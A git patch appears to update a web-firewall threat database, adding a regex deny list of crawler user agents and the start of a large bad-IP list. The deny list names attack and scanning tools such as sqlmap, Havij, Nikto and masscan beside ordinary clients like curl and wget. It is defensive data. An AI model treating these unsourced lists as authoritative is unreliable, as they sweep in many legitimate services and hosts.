From ec3e4c5f424c4fb07c9397217f8341c130cd13f3 Mon Sep 17 00:00:00 2001 From: ghost Date: Wed, 9 Oct 2024 00:50:41 +0000 Subject: [PATCH] build: Update DB [Wed Oct 9 00:50:41 UTC 2024] --- README.md | 8 +- db/MD5SUMS | 7 + db/bad-crawlers.txt | 1411 +++ db/bad-ip-addresses.txt | 21973 +++++++++++++++++++++++++++++++++ db/bad-referrers.txt | 7105 +++++++++++ db/common-web-attacks.json | 1 + db/cves.json | 1 + db/db.tar.zst | Bin 0 -> 572386 bytes db/directory-bruteforces.txt | 5332 ++++++++ 9 files changed, 35834 insertions(+), 4 deletions(-) create mode 100644 db/MD5SUMS create mode 100644 db/bad-crawlers.txt create mode 100644 db/bad-ip-addresses.txt create mode 100644 db/bad-referrers.txt create mode 100644 db/common-web-attacks.json create mode 100644 db/cves.json create mode 100644 db/db.tar.zst create mode 100644 db/directory-bruteforces.txt diff --git a/README.md b/README.md index 238fcd69..1a12f2e0 100644 --- a/README.md +++ b/README.md @@ -9,15 +9,15 @@ This collection serves as the primary repository of external resources/datasets | **Datasets** | **Count** | | -------------------- | --------- | | Common Web Attack | 76 | -| CVEs | 2671 | -| Bad IP Address | 18633 | +| CVEs | 2674 | +| Bad IP Address | 21973 | | Bad Referrer | 7104 | | Bad Crawler | 1410 | | Directory Bruteforce | 5332 | -| **Total** | **35226** | +| **Total** | **38569** | > [!NOTE] -> Last updated at **Tue Oct 8 00:50:49 UTC 2024**. +> Last updated at **Wed Oct 9 00:50:41 UTC 2024**. ## Contributions diff --git a/db/MD5SUMS b/db/MD5SUMS new file mode 100644 index 00000000..9e166973 --- /dev/null +++ b/db/MD5SUMS @@ -0,0 +1,7 @@ +d57cfba30adee8c57aecc4dc95883086 bad-crawlers.txt +447e822795959c4a62f59d72a4e840c5 bad-ip-addresses.txt +8f186aa10b19ce75203890934508f9e1 bad-referrers.txt +394f8e08f61e118f284f899558f6629f common-web-attacks.json +d80f26d81593f756bae1ffc82096c412 cves.json +d80cc1dc01773d0c74efbdfa4ed2ce07 db.tar.zst +b7a4b6211aa9022d2c699940e9c57e2f directory-bruteforces.txt diff --git a/db/bad-crawlers.txt b/db/bad-crawlers.txt new file mode 100644 index 00000000..89d586c8 --- /dev/null +++ b/db/bad-crawlers.txt @@ -0,0 +1,1411 @@ + YLT +^Aether +^Amazon Simple Notification Service Agent$ +^Amazon-Route53-Health-Check-Service +^Amazon CloudFront +^b0t$ +^bluefish +^Calypso v\/ +^COMODO DCV +^Corax +^DangDang +^DavClnt +^DHSH +^docker\/[0-9] +^Expanse +^FDM +^git\/ +^Goose\/ +^Grabber +^Gradle\/ +^HTTPClient\/ +^HTTPing +^Java\/ +^Jeode\/ +^Jetty\/ +^Mail\/ +^Mget +^Microsoft URL Control +^Mikrotik\/ +^Netlab360 +^NG\/[0-9\.] +^NING\/ +^npm\/ +^Nuclei +^PHP-AYMAPI\/ +^PHP\/ +^pip\/ +^pnpm\/ +^RMA\/ +^Ruby|Ruby\/[0-9] +^Swurl +^TLS tester +^twine\/ +^ureq +^VSE\/[0-9] +^WordPress\.com +^XRL\/[0-9] +^ZmEu +008\/ +13TABS +192\.comAgent +2GDPR\/ +2ip\.ru +404enemy +7Siters +80legs +a3logics\.in +A6-Indexer +Abonti +Aboundex +aboutthedomain +Accoona-AI-Agent +acebookexternalhit\/ +acoon +acrylicapps\.com\/pulp +Acunetix +AdAuth\/ +adbeat +AddThis +ADmantX +AdminLabs +adressendeutschland +adreview\/ +adscanner +adstxt-worker +Adstxtaggregator +adstxt\.com +Adyen HttpClient +AffiliateLabz\/ +affilimate-puppeteer +agentslug +AHC +aihit +aiohttp\/ +Airmail +akka-http\/ +akula\/ +alertra +alexa site audit +Alibaba\.Security\.Heimdall +Alligator +allloadin +AllSubmitter +alyze\.info +amagit +Anarchie +AndroidDownloadManager +Anemone +AngleSharp +annotate_google +Anthill +Anturis Agent +Ant\.com +AnyEvent-HTTP\/ +Apache Ant\/ +Apache Droid +Apache OpenOffice +Apache-HttpAsyncClient +Apache-HttpClient +ApacheBench +Apexoo +apimon\.de +APIs-Google +AportWorm\/ +AppBeat\/ +AppEngine-Google +AppleSyndication +Aprc\/[0-9] +Arachmo +arachnode +Arachnophilia +aria2 +Arukereso +asafaweb +Asana\/ +Ask Jeeves +AskQuickly +ASPSeek +Asterias +Astute +asynchttp +Attach +attohttpc +autocite +AutomaticWPTester +Autonomy +awin\.com +AWS Security Scanner +axios\/ +a\.pr-cy\.ru +B-l-i-t-z-B-O-T +Backlink-Ceck +BacklinkHttpStatus +BackStreet +BackupLand +BackWeb +Bad-Neighborhood +Badass +baidu\.com +Bandit +basicstate +BatchFTP +Battleztar Bazinga +baypup\/ +BazQux +BBBike +BCKLINKS +BDFetch +BegunAdvertising +Bewica-security-scan +Bidtellect +BigBozz +Bigfoot +biglotron +BingLocalSearch +BingPreview +binlar +biNu image cacher +Bitacle +Bitrix link preview +biz_Directory +BKCTwitterUnshortener\/ +Black Hole +Blackboard Safeassign +BlackWidow +BlockNote\.Net +BlogBridge +Bloglines +Bloglovin +BlogPulseLive +BlogSearch +Blogtrottr +BlowFish +boitho\.com-dc +Boost\.Beast +BPImageWalker +Braintree-Webhooks +Branch Metrics API +Branch-Passthrough +Brandprotect +Brandwatch +Brodie\/ +Browsershots +BUbiNG +Buck\/ +Buddy +BuiltWith +Bullseye +BunnySlippers +Burf Search +Butterfly\/ +BuzzSumo +CAAM\/[0-9] +CakePHP +Calculon +Canary%20Mail +CaretNail +catexplorador +CC Metadata Scaper +Cegbfeieh +censys +centuryb.o.t9[at]gmail.com +Cerberian Drtrs +CERT\.at-Statistics-Survey +cf-facebook +cg-eye +changedetection +ChangesMeter +Charlotte +chatterino-api-cache +CheckHost +checkprivacy +CherryPicker +ChinaClaw +Chirp\/ +chkme\.com +Chlooe +Chromaxa +CirrusExplorer +CISPA Vulnerability Notification +CISPA Web Analyser +Citoid +CJNetworkQuality +Clarsentia +clips\.ua\.ac\.be +Cloud mapping +CloudEndure +CloudFlare-AlwaysOnline +Cloudflare-Healthchecks +Cloudinary +cmcm\.com +coccoc +cognitiveseo +ColdFusion +colly - +CommaFeed +Commons-HttpClient +commonscan +contactbigdatafr +contentkingapp +Contextual Code Sites Explorer +convera +CookieReports +copyright sheriff +CopyRightCheck +Copyscape +cortex\/ +Cosmos4j\.feedback +Covario-IDS +Craw\/ +Crescent +Criteo +Crowsnest +CSHttp +CSSCheck +Cula\/ +curb +Curious George +curl +cuwhois\/ +cybo\.com +DAP\/NetHTTP +DareBoost +DatabaseDriverMysqli +DataCha0s +DatadogSynthetics +Datafeedwatch +Datanyze +DataparkSearch +dataprovider +DataXu +Daum(oa)?[ \/][0-9] +dBpoweramp +ddline +deeris +delve\.ai +Demon +DeuSu +developers\.google\.com\/\+\/web\/snippet\/ +Devil +Digg +Digincore +DigitalPebble +Dirbuster +Discourse Forum Onebox +Dispatch\/ +Disqus\/ +DittoSpyder +dlvr +DMBrowser +DNSPod-reporting +docoloc +Dolphin http client +DomainAppender +DomainLabz +Domains Project\/ +Donuts Content Explorer +dotMailer content retrieval +dotSemantic +downforeveryoneorjustme +Download Wonder +downnotifier +DowntimeDetector +Drip +drupact +Drupal \(\+http:\/\/drupal\.org\/\) +DTS Agent +dubaiindex +DuplexWeb-Google +DynatraceSynthetic +EARTHCOM +Easy-Thumb +EasyDL +Ebingbong +ec2linkfinder +eCairn-Grabber +eCatch +ECCP +eContext\/ +Ecxi +EirGrabber +ElectricMonk +elefent +EMail Exractor +EMail Wolf +EmailWolf +Embarcadero +Embed PHP Library +Embedly +endo\/ +europarchive\.org +evc-batch +EventMachine HttpClient +Everwall Link Expander +Evidon +Evrinid +ExactSearch +ExaleadCloudview +Excel\/ +exif +ExoRank +Exploratodo +Express WebPictures +Extreme Picture Finder +EyeNetIE +ezooms +facebookcatalog +facebookexternalhit +facebookexternalua +facebookplatform +fairshare +Faraday v +fasthttp +Faveeo +Favicon downloader +faviconarchive +faviconkit +FavOrg +Feed Wrangler +Feedable\/ +Feedbin +FeedBooster +FeedBucket +FeedBunch\/ +FeedBurner +feeder +Feedly +FeedshowOnline +Feedshow\/ +Feedspot +FeedViewer\/ +Feedwind\/ +FeedZcollector +feeltiptop +Fetch API +Fetch\/[0-9] +Fever\/[0-9] +FHscan +Fiery%20Feeds +Filestack +Fimap +findlink +findthatfile +FlashGet +FlipboardBrowserProxy +FlipboardProxy +FlipboardRSS +Flock\/ +Florienzh\/ +fluffy +Flunky +flynxapp +forensiq +ForusP +FoundSeoTool +fragFINN\.de +free thumbnails +Freeuploader +FreshRSS +frontman +Funnelback +Fuzz Faster U Fool +G-i-g-a-b-o-t +g00g1e\.net +ganarvisitas +gdnplus\.com +GeedoProductSearch +geek-tools +Genieo +GentleSource +GetCode +Getintent +GetLinkInfo +getprismatic +GetRight +getroot +GetURLInfo\/ +GetWeb +Geziyor +Ghost Inspector +GigablastOpenSource +GIS-LABS +github-camo +GitHub-Hookshot +github\.com +Go http package +Go [\d\.]* package http +Go!Zilla +Go-Ahead-Got-It +Go-http-client +go-mtasts\/ +gobuster +gobyus +Gofeed +gofetch +Goldfire Server +GomezAgent +gooblog +Goodzer\/ +Google AppsViewer +Google Desktop +Google favicon +Google Keyword Suggestion +Google Keyword Tool +Google Page Speed Insights +Google PP Default +Google Search Console +Google Web Preview +Google-Ads +Google-Adwords +Google-Apps-Script +Google-Calendar-Importer +Google-HotelAdsVerifier +Google-HTTP-Java-Client +Google-InspectionTool +Google-Podcast +Google-Publisher-Plugin +Google-Read-Aloud +Google-SearchByImage +Google-Site-Verification +Google-SMTP-STS +Google-speakr +Google-Structured-Data-Testing-Tool +Google-Transparency-Report +google-xrawler +Google-Youtube-Links +GoogleDocs +GoogleHC\/ +GoogleOther +GoogleProber +GoogleProducer +GoogleSites +Gookey +GoSpotCheck +gosquared-thumbnailer +Gotit +GoZilla +grabify +GrabNet +Grafula +Grammarly +GrapeFX +GreatNews +Gregarius +GRequests +grokkit +grouphigh +grub-client +gSOAP\/ +GT::WWW +GTmetrix +GuzzleHttp +gvfs\/ +HAA(A)?RTLAND http client +Haansoft +hackney\/ +Hadi Agent +HappyApps-WebCheck +Hardenize +Hatena +Havij +HaxerMen +HeadlessChrome +HEADMasterSEO +HeartRails_Capture +help@dataminr\.com +heritrix +Hexometer +historious +hkedcity +hledejLevne\.cz +Hloader +HMView +Holmes +HonesoSearchEngine +HootSuite Image proxy +Hootsuite-WebFeed +hosterstats +HostTracker +ht:\/\/check +htdig +HTMLparser +htmlyse +HTTP Banner Detection +http-get +HTTP-Header-Abfrage +http-kit +http-request\/ +HTTP-Tiny +HTTP::Lite +http:\/\/www.neomo.de\/ +HttpComponents +httphr +HTTPie +HTTPMon +httpRequest +httpscheck +httpssites_power +httpunit +HttpUrlConnection +http\.rb\/ +HTTP_Compression_Test +http_get +http_request2 +http_requester +httrack +huaweisymantec +HubSpot +HubSpot-Link-Resolver +Humanlinks +i2kconnect\/ +Iblog +ichiro +Id-search +IdeelaborPlagiaat +IDG Twitter Links Resolver +IDwhois\/ +Iframely +igdeSpyder +iGooglePortal +IlTrovatore +Image Fetch +Image Sucker +ImageEngine\/ +ImageVisu\/ +Imagga +imagineeasy +imgsizer +InAGist +inbound\.li parser +InDesign%20CC +Indy Library +InetURL +infegy +infohelfer +InfoTekies +InfoWizards Reciprocal Link +inpwrd\.com +instabid +Instapaper +Integrity +integromedb +Intelliseek +InterGET +Internet Ninja +InternetSeer +internetVista monitor +internetwache +internet_archive +intraVnews +IODC +IOI +Inboxb0t +iplabel +ips-agent +IPS\/[0-9] +IPWorks HTTP\/S Component +iqdb\/ +Iria +Irokez +isitup\.org +iskanie +isUp\.li +iThemes Sync\/ +IZaBEE +iZSearch +JAHHO +janforman +Jaunt\/ +Java.*outbrain +javelin\.io +Jbrofuzz +Jersey\/ +JetCar +Jigsaw +Jobboerse +JobFeed discovery +Jobg8 URL Monitor +jobo +Jobrapido +Jobsearch1\.5 +JoinVision Generic +JolokiaPwn +Joomla +Jorgee +JS-Kit +JungleKeyThumbnail +JustView +Kaspersky Lab CFR link resolver +Kelny\/ +Kerrigan\/ +KeyCDN +Keyword Density +Keywords Research +khttp\/ +KickFire +KimonoLabs\/ +Kml-Google +knows\.is +KOCMOHABT +kouio +kube-probe +kubectl +kulturarw3 +KumKie +Larbin +Lavf\/ +leakix\.net +LeechFTP +LeechGet +letsencrypt +Lftp +LibVLC +LibWeb +Libwhisker +libwww +Licorne +Liferea\/ +Lighthouse +Lightspeedsystems +Likse +limber\.io +Link Valet +LinkAlarm\/ +LinkAnalyser +link-check +linkCheck +linkdex +LinkExaminer +linkfluence +linkpeek +LinkPreview +LinkScan +LinksManager +LinkTiger +LinkWalker +link_thumbnailer +Lipperhey +Litemage_walker +livedoor ScreenShot +LoadImpactRload +localsearch-web +LongURL API +longurl-r-package +looid\.com +looksystems\.net +lscache_runner +ltx71 +lua-resty-http +Lucee \(CFML Engine\) +Lush Http Client +lwp-request +lwp-trivial +LWP::Simple +lycos +LYT\.SR +L\.webis +mabontland +MacOutlook\/ +Mag-Net +MagpieRSS +Mail::STS +MailChimp +Mail\.Ru +Majestic12 +makecontact\/ +Mandrill +MapperCmd +marketinggrader +MarkMonitor +MarkWatch +Mass Downloader +masscan\/ +Mata Hari +mattermost +Mediametric +Mediapartners-Google +mediawords +MegaIndex\.ru +MeltwaterNews +Melvil Rawi +MemGator +Metaspinner +MetaURI +MFC_Tear_Sample +Microsearch +Microsoft Data Access +Microsoft Office +Microsoft Outlook +Microsoft Windows Network Diagnostics +Microsoft-WebDAV-MiniRedir +Microsoft\.Data\.Mashup +MicrosoftPreview +MIDown tool +MIIxpc +Mindjet +Miniature\.io +Miniflux +mio_httpc +Miro-HttpClient +Mister PiX +mixdata dot com +mixed-content-scan +mixnode +Mnogosearch +mogimogi +Mojeek +Mojolicious \(Perl\) +Mollie +monitis +Monitority\/ +Monit\/ +montastic +MonTools +Moreover +Morfeus Fucking Scanner +Morning Paper +MovableType +mowser +Mrcgiguy +Mr\.4x3 Powered +MS Web Services Client Protocol +MSFrontPage +mShots +MuckRack\/ +muhstik-scan +MVAClient +MxToolbox\/ +myseosnapshot +nagios +Najdi\.si +Name Intelligence +NameFo\.com +Nameprotect +nationalarchives +Navroad +nbertaupete95 +NearSite +Needle +Nessus +Net Vampire +NetAnts +NETCRAFT +NetLyzer +NetMechanic +NetNewsWire +Netpursual +netresearch +NetShelter ContentScan +Netsparker +NetSystemsResearch +nettle +NetTrack +Netvibes +NetZIP +Neustar WPM +NeutrinoAPI +NewRelicPinger +NewsBlur .*Finder +NewsGator +newsme +newspaper\/ +Nexgate Ruby Client +NG-Search +nghttp2 +Nibbler +NICErsPRO +NihilScio +Nikto +nineconnections +NLNZ_IAHarvester +Nmap Scripting Engine +node-fetch +node-superagent +node-urllib +Nodemeter +NodePing +node\.io +nominet\.org\.uk +nominet\.uk +Norton-Safeweb +Notifixious +notifyninja +NotionEmbedder +nuhk +nutch +Nuzzel +nWormFeedFinder +nyawc\/ +Nymesis +NYU +Observatory\/ +Ocelli\/ +Octopus +oegp +Offline Explorer +Offline Navigator +OgScrper +okhttp +omgili +OMSC +Online Domain Tools +Open Source RSS +OpenCalaisSemanticProxy +Openfind +OpenLinkProfiler +Openstat\/ +OpenVAS +OPPO A33 +Optimizer +Orbiter +OrgProbe\/ +orion-semantics +Outlook-Express +Outlook-iOS +Owler +Owlin +ownCloud News +ow\.ly +OxfordCloudService +page scorer +Page Valet +page2rss +PageFreezer +PageGrabber +PagePeeker +PageScorer +Pagespeed\/ +PageThing +page_verifier +Panopta +panscient +Papa Foto +parsijoo +Pavuk +PayPal IPN +pcBrowser +Pcore-HTTP +PDF24 URL To PDF +Pearltrees +PECL::HTTP +peerindex +Peew +PeoplePal +Perlu - +PhantomJS Screenshoter +PhantomJS\/ +Photon\/ +php-requests +phpservermon +Pi-Monster +Picscout +Picsearch +PictureFinder +Pimonster +Pingability +PingAdmin\.Ru +Pingdom +Pingoscope +PingSpot +ping\.blo\.gs +pinterest\.com +Pixray +Pizilla +Plagger\/ +Pleroma +Ploetz \+ Zeller +Plukkie +plumanalytics +PocketImageCache +PocketParser +Pockey +PodcastAddict\/ +POE-Component-Client-HTTP +Polymail\/ +Pompos +Porkbun +Port Monitor +postano +postfix-mta-sts-resolver +PostmanRuntime +postplanner\.com +PostPost +postrank +PowerPoint\/ +Prebid +Prerender +Priceonomics Analysis Engine +PrintFriendly +PritTorrent +Prlog +probely\.com +probethenet +Project ?25499 +Project-Resonance +prospectb2b +Protopage +ProWebWalker +proximic +PRTG Network Monitor +pshtt, https scanning +PTST +PTST\/[0-9]+ +pulsetic\.com +Pump +Python-httplib2 +python-httpx +python-requests +Python-urllib +Qirina Hurdler +QQDownload +QrafterPro +Qseero +Qualidator +QueryN Metasearch +queuedriver +quic-go-HTTP\/ +QuiteRSS +Quora Link Preview +Qwantify +Radian6 +RadioPublicImageResizer +Railgun\/ +RankActive +RankFlex +RankSonicSiteAuditor +RapidLoad\/ +Re-re Studio +ReactorNetty +Readability +RealDownload +RealPlayer%20Downloader +RebelMouse +Recorder +RecurPost\/ +redback\/ +ReederForMac +Reeder\/ +ReGet +RepoMonkey +request\.js +reqwest\/ +ResponseCodeTest +RestSharp +Riddler +Rival IQ +Robosourcer +Robozilla +ROI Hunter +RPT-HTTPClient +RSSMix\/ +RSSOwl +RuxitSynthetic +RyowlEngine +safe-agent-scanner +SalesIntelligent +Saleslift +SAP NetWeaver Application Server +SauceNAO +SBIder +sc-downloader +scalaj-http +Scamadviser-Frontend +ScanAlert +scan\.lol +Scoop +scooter +ScopeContentAG-HTTP-Client +ScoutJet +ScoutURLMonitor +ScrapeBox Page Scanner +Scrapy +Screaming +ScreenShotService +Scrubby +Scrutiny\/ +Search37 +searchenginepromotionhelp +Searchestate +SearchExpress +SearchSight +SearchWP +search\.thunderstone +Seeker +semanticdiscovery +semanticjuice +Semiocast HTTP client +Semrush +Sendsay\.Ru +sentry\/ +SEO Browser +Seo Servis +seo-nastroj\.cz +seo4ajax +Seobility +SEOCentro +SeoCheck +seocompany +SEOkicks +SEOlizer +Seomoz +SEOprofiler +seoscanners +SEOsearch +seositecheckup +SEOstats +servernfo +sexsearcher +Seznam +Shelob +Shodan +Shoppimon +ShopWiki +ShortLinkTranslate +shortURL lengthener +shrinktheweb +Sideqik +Siege +SimplePie +SimplyFast +Siphon +SISTRIX +Site Sucker +Site-Shot\/ +Site24x7 +SiteBar +Sitebeam +Sitebulb\/ +SiteCondor +SiteExplorer +SiteGuardian +Siteimprove +SiteIndexed +Sitemap(s)? Generator +SitemapGenerator +SiteMonitor +Siteshooter B0t +SiteSnagger +SiteSucker +SiteTruth +Sitevigil +sitexy\.com +SkypeUriPreview +Slack\/ +sli-systems\.com +slider\.com +slurp +SlySearch +SmartDownload +SMRF URL Expander +SMUrlExpander +Snake +Snappy +SnapSearch +Snarfer\/ +SniffRSS +sniptracker +Snoopy +SnowHaze Search +sogou web +SortSite +Sottopop +sovereign\.ai +SpaceBison +SpamExperts +Spammen +Spanner +Spawning-AI +spaziodati +SPDYCheck +Specificfeeds +SpeedKit +speedy +SPEng +Spinn3r +spray-can +Sprinklr +spyonweb +sqlmap +Sqlworm +Sqworm +SSL Labs +ssl-tools +StackRambler +Statastico\/ +Statically- +StatusCake +Steeler +Stratagems Kumo +Stripe\/ +Stroke\.cz +StudioFACA +StumbleUpon +suchen +Sucuri +summify +SuperHTTP +Surphace Scout +Suzuran +swcd +Symfony BrowserKit +Symfony2 BrowserKit +Synapse\/ +Syndirella\/ +SynHttpClient-Built +Sysomos +sysscan +Szukacz +T0PHackTeam +tAkeOut +Tarantula\/ +Taringa UGC +TarmotGezgin +tchelebi\.io +techiaith\.cymru +Teleport +Telesoft +Telesphoreo +Telesphorep +Tenon\.io +teoma +terrainformatica +Test Certificate Info +testuri +Tetrahedron +TextRazor Downloader +The Drop Reaper +The Expert HTML Source Viewer +The Intraformant +The Knowledge AI +theinternetrules +TheNomad +Thinklab +Thumbor +Thumbshots +ThumbSniper +timewe\.net +TinEye +Tiny Tiny RSS +TLSProbe\/ +Toata +topster +touche\.com +Traackr\.com +tracemyfile +Trackuity +TrapitAgent +Trendiction +Trendsmap +trendspottr +truwoGPS +TryJsoup +TulipChain +Turingos +Turnitin +tweetedtimes +Tweetminster +Tweezler\/ +twibble +Twice +Twikle +Twingly +Twisted PageGetter +Typhoeus +ubermetrics-technologies +uclassify +UdmSearch +ultimate_sitemap_parser +unchaos +unirest-java +UniversalFeedParser +unshortenit +Unshorten\.It +Untiny +UnwindFetchor +updated +updown\.io daemon +Upflow +Uptimia +URL Verifier +Urlcheckr +URLitor +urlresolver +Urlstat +URLTester +UrlTrends Ranking Updater +URLy Warning +URLy\.Warning +URL\/Emacs +Vacuum +Vagabondo +VB Project +vBSEO +VCI +Verity +via ggpht\.com GoogleImageProxy +Virusdie +visionutils +Visual Rights Group +vkShare +VoidEYE +Voil +voltron +voyager\/ +VSAgent\/ +VSB-TUO\/ +Vulnbusters Meter +VYU2 +w3af\.org +W3C-checklink +W3C-mobileOK +W3C_Unicorn +WAC-OFU +WakeletLinkExpander +WallpapersHD +Wallpapers\/[0-9]+ +wangling +Wappalyzer +WatchMouse +WbSrch\/ +WDT\.io +Web Auto +Web Collage +Web Enhancer +Web Fetch +Web Fuck +Web Pix +Web Sauger +Web spyder +Web Sucker +web-capture\.net +Web-sniffer +Webalta +Webauskunft +WebAuto +WebCapture +WebClient\/ +webcollage +WebCookies +WebCopier +WebCorp +WebDataStats +WebDoc +WebEnhancer +WebFetch +WebFuck +WebGazer +WebGo IS +WebImageCollector +WebImages +WebIndex +webkit2png +WebLeacher +webmastercoffee +webmon +WebPix +WebReaper +WebSauger +webscreenie +Webshag +Webshot +Website Quester +websitepulse agent +WebsiteQuester +Websnapr +WebSniffer +Webster +WebStripper +WebSucker +webtech\/ +WebThumbnail +Webthumb\/ +WebWhacker +WebZIP +WeLikeLinks +WEPA +WeSEE +wf84 +Wfuzz\/ +wget +WhatCMS +WhatsApp +WhatsMyIP +WhatWeb +WhereGoes\? +Whibse +WhoAPI\/ +WhoRunsCoinHive +Whynder Magnet +Windows-RSS-Platform +WinHttp-Autoproxy-Service +WinHTTP\/ +WinPodder +wkhtmlto +wmtips +Woko +Wolfram HTTPClient +woorankreview +WordPress\/ +WordupinfoSearch +Word\/ +worldping-api +wotbox +WP Engine Install Performance API +WP Rocket +wpif +wprecon\.com survey +WPScan +wscheck +Wtrace +WWW-Collector-E +WWW-Mechanize +WWW::Document +WWW::Mechanize +WWWOFFLE +www\.monitor\.us +x09Mozilla +x22Mozilla +XaxisSemanticsClassifier +XenForo\/ +Xenu Link Sleuth +XING-contenttabreceiver +xpymep([0-9]?)\.exe +Y!J-[A-Z][A-Z][A-Z] +Yaanb +yacy +Yahoo Link Preview +YahooCacheSystem +YahooMailProxy +YahooYSMcm +YandeG +Yandex(?!Search) +yanga +yeti +Yo-yo +Yoleo Consumer +yomins\.com +yoogliFetchAgent +YottaaMonitor +Your-Website-Sucks +yourls\.org +YoYs\.net +YP\.PL +Zabbix +Zade +Zao +Zapier +Zauba +Zemanta Aggregator +Zend\\Http\\Client +Zend_Http_Client +Zermelo +Zeus +zgrab +ZnajdzFoto +ZnHTTP +Zombie\.js +Zoom\.Mac +ZoteroTranslationServer +ZyBorg +[a-z0-9\-_]*(bot|crawl|archiver|transcoder|spider|uptime|validator|fetcher|cron|checker|reader|extractor|monitoring|analyzer|scraper) \ No newline at end of file diff --git a/db/bad-ip-addresses.txt b/db/bad-ip-addresses.txt new file mode 100644 index 00000000..2257c5e7 --- /dev/null +++ b/db/bad-ip-addresses.txt @@ -0,0 +1,21973 @@ +1.0.254.123 +1.1.178.34 +1.11.62.197 +1.12.60.59 +1.14.108.22 +1.14.139.92 +1.14.177.4 +1.14.205.166 +1.15.249.6 +1.158.7.183 +1.161.189.179 +1.162.225.69 +1.163.25.37 +1.165.176.202 +1.168.242.172 +1.170.45.12 +1.172.95.139 +1.173.109.229 +1.173.238.19 +1.174.20.156 +1.174.205.39 +1.174.96.204 +1.175.15.225 +1.178.45.115 +1.179.128.124 +1.179.220.209 +1.179.228.195 +1.180.219.210 +1.180.219.211 +1.180.219.212 +1.180.230.98 +1.180.98.210 +1.183.13.194 +1.192.48.215 +1.194.160.101 +1.194.160.98 +1.194.166.30 +1.197.78.123 +1.2.146.166 +1.2.190.36 +1.20.169.169 +1.201.162.20 +1.202.113.85 +1.202.116.237 +1.202.117.60 +1.202.223.2 +1.209.148.183 +1.21.202.235 +1.212.225.99 +1.214.197.163 +1.214.34.26 +1.214.42.172 +1.215.240.130 +1.220.226.228 +1.220.64.218 +1.232.29.63 +1.234.28.71 +1.234.31.117 +1.234.58.162 +1.234.70.108 +1.235.192.131 +1.237.137.30 +1.238.106.229 +1.245.207.104 +1.247.245.61 +1.252.63.242 +1.254.101.182 +1.26.70.70 +1.28.192.150 +1.28.194.22 +1.30.20.2 +1.30.20.238 +1.30.20.98 +1.31.80.166 +1.31.80.222 +1.31.87.230 +1.34.120.147 +1.34.143.81 +1.34.144.58 +1.34.156.10 +1.34.181.220 +1.34.209.79 +1.34.232.105 +1.34.239.180 +1.34.254.216 +1.34.29.158 +1.34.48.160 +1.34.54.176 +1.34.73.192 +1.34.77.176 +1.34.85.243 +1.34.97.19 +1.36.65.78 +1.36.81.113 +1.4.171.222 +1.44.125.62 +1.52.21.112 +1.52.242.130 +1.53.128.190 +1.53.4.113 +1.53.99.18 +1.54.164.135 +1.54.179.204 +1.55.33.86 +1.55.82.122 +1.57.22.19 +1.59.65.247 +1.64.187.93 +1.69.104.139 +1.69.111.254 +1.69.21.108 +1.69.41.87 +1.69.52.128 +1.69.62.133 +1.69.67.158 +1.7.229.162 +1.70.101.61 +1.70.12.122 +1.70.12.194 +1.70.124.128 +1.70.125.155 +1.70.125.193 +1.70.125.37 +1.70.126.104 +1.70.126.138 +1.70.126.98 +1.70.127.146 +1.70.13.251 +1.70.13.65 +1.70.134.206 +1.70.137.122 +1.70.137.254 +1.70.139.126 +1.70.14.200 +1.70.14.28 +1.70.140.162 +1.70.140.165 +1.70.142.225 +1.70.142.255 +1.70.143.105 +1.70.15.176 +1.70.15.66 +1.70.160.30 +1.70.165.166 +1.70.172.159 +1.70.175.247 +1.70.176.26 +1.70.178.209 +1.70.180.185 +1.70.186.131 +1.70.190.118 +1.70.190.235 +1.70.8.12 +1.70.8.223 +1.70.80.99 +1.70.85.254 +1.70.9.99 +1.70.96.224 +1.70.98.208 +1.71.2.174 +1.82.191.110 +1.82.217.54 +1.9.177.11 +1.94.108.224 +100.15.97.125 +100.29.192.1 +100.29.192.10 +100.29.192.100 +100.29.192.101 +100.29.192.102 +100.29.192.103 +100.29.192.104 +100.29.192.105 +100.29.192.106 +100.29.192.107 +100.29.192.108 +100.29.192.109 +100.29.192.11 +100.29.192.110 +100.29.192.111 +100.29.192.112 +100.29.192.113 +100.29.192.114 +100.29.192.115 +100.29.192.116 +100.29.192.117 +100.29.192.118 +100.29.192.119 +100.29.192.120 +100.29.192.121 +100.29.192.122 +100.29.192.123 +100.29.192.124 +100.29.192.125 +100.29.192.126 +100.29.192.127 +100.29.192.13 +100.29.192.14 +100.29.192.15 +100.29.192.16 +100.29.192.17 +100.29.192.18 +100.29.192.2 +100.29.192.20 +100.29.192.21 +100.29.192.22 +100.29.192.23 +100.29.192.24 +100.29.192.25 +100.29.192.26 +100.29.192.27 +100.29.192.28 +100.29.192.29 +100.29.192.3 +100.29.192.30 +100.29.192.31 +100.29.192.33 +100.29.192.34 +100.29.192.35 +100.29.192.37 +100.29.192.38 +100.29.192.39 +100.29.192.4 +100.29.192.40 +100.29.192.41 +100.29.192.42 +100.29.192.43 +100.29.192.44 +100.29.192.45 +100.29.192.46 +100.29.192.47 +100.29.192.48 +100.29.192.49 +100.29.192.5 +100.29.192.50 +100.29.192.51 +100.29.192.52 +100.29.192.53 +100.29.192.54 +100.29.192.55 +100.29.192.56 +100.29.192.57 +100.29.192.58 +100.29.192.59 +100.29.192.6 +100.29.192.60 +100.29.192.62 +100.29.192.63 +100.29.192.65 +100.29.192.66 +100.29.192.67 +100.29.192.68 +100.29.192.69 +100.29.192.7 +100.29.192.70 +100.29.192.71 +100.29.192.72 +100.29.192.73 +100.29.192.74 +100.29.192.75 +100.29.192.76 +100.29.192.77 +100.29.192.78 +100.29.192.8 +100.29.192.80 +100.29.192.81 +100.29.192.82 +100.29.192.84 +100.29.192.85 +100.29.192.86 +100.29.192.87 +100.29.192.88 +100.29.192.89 +100.29.192.9 +100.29.192.90 +100.29.192.91 +100.29.192.92 +100.29.192.94 +100.29.192.95 +100.29.192.96 +100.29.192.97 +100.29.192.98 +100.29.192.99 +100.37.1.10 +100.42.184.121 +101.100.181.79 +101.100.184.80 +101.108.47.230 +101.109.176.188 +101.126.11.251 +101.126.17.129 +101.126.18.31 +101.126.20.192 +101.126.21.179 +101.126.21.209 +101.126.21.240 +101.126.21.63 +101.126.22.227 +101.126.23.102 +101.126.24.74 +101.126.26.215 +101.126.27.230 +101.126.30.240 +101.126.31.191 +101.126.31.21 +101.126.4.240 +101.126.5.109 +101.126.54.167 +101.126.54.36 +101.126.54.66 +101.126.54.88 +101.126.54.95 +101.126.55.179 +101.126.55.63 +101.126.6.108 +101.126.64.102 +101.126.64.251 +101.126.65.104 +101.126.66.68 +101.126.67.115 +101.126.69.223 +101.126.71.44 +101.126.78.197 +101.126.81.18 +101.126.81.188 +101.126.82.218 +101.126.85.95 +101.126.88.245 +101.126.88.251 +101.126.88.79 +101.126.88.93 